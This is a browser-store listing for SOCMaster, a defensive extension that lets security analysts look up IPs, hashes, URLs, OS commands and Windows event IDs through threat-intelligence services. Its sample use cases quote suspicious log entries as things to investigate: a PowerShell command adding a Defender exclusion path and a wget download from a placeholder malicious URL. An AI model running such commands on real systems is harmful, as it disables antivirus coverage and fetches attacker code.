Item logo image for SOCMaster

SOCMaster

Featured
5.0(

2 ratings

)
ExtensionTools170 users
Item media 5 screenshot
Item media 6 screenshot
Item video thumbnail
Item media 2 screenshot
Item media 3 screenshot
Item media 4 screenshot
Item media 5 screenshot
Item media 6 screenshot
Item video thumbnail
Item media 2 screenshot
Item video thumbnail
Item media 2 screenshot
Item media 3 screenshot
Item media 4 screenshot
Item media 5 screenshot
Item media 6 screenshot

Overview

Get info on OS Commands, IPs, Domains, URLs, Hashes, Windows Events and Registry keys, Strings, and Files with one click.

SOCMaster is a powerful browser extension designed to enhance the efficiency and effectiveness of cybersecurity professionals. With a single click, users can scan IP addresses, domains, URLs, file hashes, and more directly from their browser, transforming raw data into actionable intelligence. Whether you're a threat hunter, SOC analyst, or incident responder, SOCMaster streamlines your workflow by integrating directly with leading threat intelligence platforms. SOCMaster integrates with leading threat intelligence platforms such as VirusTotal, AbuseIPDB, and others, allowing users to swiftly transform data into actionable insights. ============================== USAGE ============================== Single lookup 1. From the web browser, select or highlight an artifact and right-click 2. Select "SOCMaster" 3. Click one of the options available 4. Menu will appear on lower right side containing information on the artifacts Bulk lookups --allows you to quickly assess multiple artifacts at once, saving time during intensive investigations. 1. From the web browser, gather a list of either IP addresses, Domains, URLs, File Hashes, File Names. Each entry separated by new line or spaces For example: 8.8.8.8 7.7.7.7 6.6.6.6 2. Highlight all of the objects to be scanned, right-click, and select "SOCMaster" 3. Click one of the options available (IP/Domain/URL/Hash scan using vendor API keys or Get file (Linux/Windows) information) 4. Menu will appear on lower right side containing information on each object. Reputation of artifact from threat intel vendors will also show. =============================== MAIN FEATURES =============================== 1. IP/Domain/Hash using vendor API keys: - Uses Threat intelligence vendors such as AbuseIPDB, VirusTotal, AlienVaultOTX, HybridAnalysis and others to obtain the reputation and information on an IP address, Domain, Hash. Data available is dependent on the vendor. - Requires API key from Vendor. 2. URL scan using vendor API keys: - Submits URLs to URLscan.io, VirusTotal, AlienVault, HybridAnalysis and others for analysis using API keys. - Click the vendor link to view the URL scan result. - Requires API key from Vendor. 3. Get OS command information (PowerShell, Windows, Linux OSX): - Get information on over 3,300 Powershell cmdlets from Powershell modules, almost all Linux commands (Man Sections 1-8), Windows commands, and OSX commands. - Shows information on Operating System binaries and commands. For example, Windows commands such as "ipconfig" or "tasklist", "Set-ExecutionPolicy" for Powershell, and "rm" for Linux. - No API key required 4. Get file (Linux/Windows) or Registry key (Windows) information: - Retrieve information on known files such as "kernel32.dll" for Windows or "passwd" for Linux. - Get information on Windows Registry keys such as "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce". - No API key required 5. Get event ID Information (Windows): - Show documentation on a Windows Event Log using its Event ID - No API key required 6. String search (Twitter, Google): - Display results from Twitter or Google search results using a string of characters ============================== API KEY CONFIGURATION ============================== To query an IP, Domain, and Hash using vendor API keys, an API key is required. Follow the steps: 1. Click Extensions icon in Google Chrome's upper right menu 2. Click the "SOCMaster" icon > Settings 3. On the settings page, on the upper right corner click "Add API key" 4. On intel source selection, select API key vendor 5. Paste vendor API key on the API key field 6. Click save 7. API key now added, IP/Domain/Hash scan using vendor API keys can now be used ============================== SAMPLE USE CASE ============================== 1. Suspicious PowerShell logs show: Set-MpPreference -ExclusionPath "C:\users\public\documents\sucmra" A user can highlight the above command and select the "Find command information" option and will be able to view the syntax and parameters of the command. 2. Suspicious IP address from the firewall logs: x.x.x.x A user can highlight the IP and select the "IP scan using vendor API keys" option and will be able to view IP reputation and data from vendors. 3. Suspicious linux command show: wget http://malicious_url -O A user can highlight the above command and select the "Find command information" option and will be able to view the syntax and parameters of the command. 4. Windows Event IDs on the SIEM show: eventID 4624 A user can highlight the event ID number and select the "Get event ID information" option and will be able to view the fields and description of the Windows event ============================== CREDITS ============================== Supports the following vendors: VirusTotal AbuseIPDB AlienVaultOTX Twitter URLscan HybridAnalysis GoogleSearch Pulsedive Author contact: https://www.linkedin.com/in/marcusmcapistrano/

5 out of 52 ratings

Google doesn't verify reviews. Learn more about results and reviews.

Review's profile picture

Marinela Isabelle CapistranoFeb 21, 2023

very useful tool for searching definitions

1 person found this review to be helpful

Details

  • Version
    0.5.9
  • Updated
    October 5, 2024
  • Offered by
    Marcus Capistrano
  • Size
    493KiB
  • Languages
    English
  • Developer
    Email
    marcuscapistrano69@gmail.com
  • Non-trader
    This developer has not identified itself as a trader. For consumers in the European Union, please note that consumer rights do not apply to contracts between you and this developer.

Privacy

The developer has disclosed that it will not collect or use your data. To learn more, see the developer’s privacy policy.

This developer declares that your data is

  • Not being sold to third parties, outside of the approved use cases
  • Not being used or transferred for purposes that are unrelated to the item's core functionality
  • Not being used or transferred to determine creditworthiness or for lending purposes

Support

For help with questions, suggestions, or problems, visit the developer's support site

Google apps